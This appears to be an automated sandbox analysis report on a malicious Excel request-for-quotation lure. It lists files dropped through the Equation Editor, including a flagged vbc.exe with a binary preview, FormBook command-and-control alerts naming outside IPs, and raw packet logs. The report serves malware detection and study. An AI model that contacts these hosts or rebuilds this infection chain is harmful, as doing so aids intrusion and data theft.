                                                  Preview: .PNG........IHDR...............=c....tEXtSoftware.Adobe ImageReadyq.e<...~iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:DocumentID="xmp.did:EDC9411A6A5F11E2838BB9184F90E845" xmpMM:InstanceID="xmp.iid:EDC941196A5F11E2838BB9184F90E845" xmp:CreatorTool="Adobe Photoshop CS2 Windows"> <xmpMM:DerivedFrom stRef:instanceID="uuid:5A79598F285EDB11B275CB8CE9AFFC64" stRef:documentID="adobe:docid:photoshop:51683bff-375b-11d9-ab90-a923e782e0b8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...F....PLTE..............
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\90706C26.jpeg
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                                                  Category:dropped
                                                  Size (bytes):4396
                                                  Entropy (8bit):7.884233298494423
                                                  Encrypted:false
                                                  SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                                                  MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                                                  SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                                                  SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                                                  SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                                                  Malicious:false
                                                  Preview: ......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B082A1EF.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):11303
                                                  Entropy (8bit):7.909402464702408
                                                  Encrypted:false
                                                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                  Malicious:false
                                                  Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C040A83A.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):11303
                                                  Entropy (8bit):7.909402464702408
                                                  Encrypted:false
                                                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                  Malicious:false
                                                  Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D37E7324.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):10202
                                                  Entropy (8bit):7.870143202588524
                                                  Encrypted:false
                                                  SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                                  MD5:66EF10508ED9AE9871D59F267FBE15AA
                                                  SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                                  SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                                  SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                                  Malicious:false
                                                  Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EB750BDD.jpeg
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                                                  Category:dropped
                                                  Size (bytes):4396
                                                  Entropy (8bit):7.884233298494423
                                                  Encrypted:false
                                                  SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                                                  MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                                                  SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                                                  SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                                                  SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                                                  Malicious:false
                                                  Preview: ......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F3F9A6F3.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):10202
                                                  Entropy (8bit):7.870143202588524
                                                  Encrypted:false
                                                  SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                                  MD5:66EF10508ED9AE9871D59F267FBE15AA
                                                  SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                                  SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                                  SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                                  Malicious:false
                                                  Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                                  C:\Users\user\AppData\Local\Temp\~DF182ACAA3E256FB8B.TMP
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\~DF348A23C0846DCD61.TMP
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\~DF464E500D1B1A44AE.TMP
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\~DF474EEA2985E340FB.TMP
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:CDFV2 Encrypted
                                                  Category:dropped
                                                  Size (bytes):317816
                                                  Entropy (8bit):7.9785869008250065
                                                  Encrypted:false
                                                  SSDEEP:6144:Tvu1GedR2fSZ3lWkAfjP7FW+Ij8+BGd/m/SvMeH6x0mdEa1f2K9doyi:j+VjUs4kWP5W+IY+BGd/m/SvMekp5Q
                                                  MD5:DA4BEFA8DFE9D56B937B01A2D2818175
                                                  SHA1:CF8E6AE0B8AFB3D3F2956FBE0C88599FB361EDE8
                                                  SHA-256:87F4B613C197B92F31D5EED4C7AD32A8BA4AE68313D56B54FF656F273FB56D86
                                                  SHA-512:421CE4922A5C05C59DC9993AC48DA9D99D990BD9A46587E2BA2116F55889EAD2378239C79154D3EF03178C49F0E6AEE1BC1ECF1E64CDAF450D5D0B2316B6E15D
                                                  Malicious:false
                                                  Preview: ......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                  C:\Users\user\Desktop\~$RFQ HCI20220113.xlsx
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):165
                                                  Entropy (8bit):1.4377382811115937
                                                  Encrypted:false
                                                  SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                  MD5:797869BB881CFBCDAC2064F92B26E46F
                                                  SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                  SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                  SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                  Malicious:true
                                                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                  C:\Users\Public\vbc.exe
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):417792
                                                  Entropy (8bit):7.729098788142576
                                                  Encrypted:false
                                                  SSDEEP:12288:gyK777777777777OPMfcmnxTLrXEQ0/Ll1PishiMkNMfPjJ8W:jK777777777777OKLQR1Pf+aP6W
                                                  MD5:83AC585E99B527EEB278702F8F711568
                                                  SHA1:A576A927B067C94CDBC1E7B353F60577F5B310F9
                                                  SHA-256:9E2502B3945F31482623E8E61DCB85B9EBB7D9A4244D9074FA289596C9DA513E
                                                  SHA-512:F4A5F197CCA552237CA4CA0DBDBA4AF5E5C0F6BCA7A05313A61D96C5021049EDEB0B38D8E4AD5EE3B062692038F05254787A57C5C1A0E951E9A9B9F091A304AC
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 44%
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H?.a.................V..........:u... ........@.. ....................................@..................................t..W.................................................................................... ............... ..H............text...@U... ...V.................. ..`.rsrc................X..............@..@.reloc...............^..............@..B.................u......H.......|F..d.......-....]..............................................z.(......}.....(....o....}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....o....:q....(....+..(........}.........(......*................n..}.....{....,..{....oc...*..{....*.s..

                                                  Static File Info

                                                  General

                                                  File type:CDFV2 Encrypted
                                                  Entropy (8bit):7.9785869008250065
                                                  TrID:
                                                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                  File name:RFQ HCI20220113.xlsx
                                                  File size:317816
                                                  MD5:da4befa8dfe9d56b937b01a2d2818175
                                                  SHA1:cf8e6ae0b8afb3d3f2956fbe0c88599fb361ede8
                                                  SHA256:87f4b613c197b92f31d5eed4c7ad32a8ba4ae68313d56b54ff656f273fb56d86
                                                  SHA512:421ce4922a5c05c59dc9993ac48da9d99d990bd9a46587e2ba2116f55889ead2378239c79154d3ef03178c49f0e6aee1bc1ecf1e64cdaf450d5d0b2316b6e15d
                                                  SSDEEP:6144:Tvu1GedR2fSZ3lWkAfjP7FW+Ij8+BGd/m/SvMeH6x0mdEa1f2K9doyi:j+VjUs4kWP5W+IY+BGd/m/SvMekp5Q
                                                  File Content Preview:........................>......................................................................................................................................................................................................................................

                                                  File Icon

                                                  Icon Hash:e4e2aa8aa4b4bcb4

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  01/13/22-20:22:49.687273TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.22103.224.212.220
                                                  01/13/22-20:22:49.687273TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.22103.224.212.220
                                                  01/13/22-20:22:49.687273TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.22103.224.212.220
                                                  01/13/22-20:23:00.496770TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.22122.10.28.11
                                                  01/13/22-20:23:00.496770TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.22122.10.28.11
                                                  01/13/22-20:23:00.496770TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.22122.10.28.11
                                                  01/13/22-20:23:11.619415TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917280192.168.2.22192.185.98.251
                                                  01/13/22-20:23:11.619415TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917280192.168.2.22192.185.98.251
                                                  01/13/22-20:23:11.619415TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917280192.168.2.22192.185.98.251

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 13, 2022 20:21:55.579416990 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:55.694510937 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:55.694689035 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:55.695291996 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:55.811695099 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:55.811763048 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:55.811800003 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:55.811837912 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:55.811898947 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:55.811955929 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:55.926425934 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:55.926457882 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:55.926476002 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:55.926496029 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:55.926512957 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:55.926528931 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:55.926544905 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:55.926565886 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:55.926613092 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:55.926655054 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.040818930 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.040985107 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.041049004 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.041095018 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.041099072 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.041160107 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.041191101 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.041201115 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.041217089 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.041232109 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.041234970 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.041304111 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.041325092 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.041343927 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.041352034 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.041383982 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.041393042 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.041423082 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.041448116 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.041462898 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.041464090 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.041503906 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.041517973 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.041543007 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.041558981 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.041584015 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.041584969 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.041621923 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.041630983 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.041665077 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.044822931 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156091928 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156125069 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156141996 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156157017 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156172991 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156188965 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156203985 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156219959 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156296015 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156311989 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156337023 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156353951 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156366110 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156368971 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156387091 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156404018 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156408072 CET8049167198.23.213.59192.168.2.22
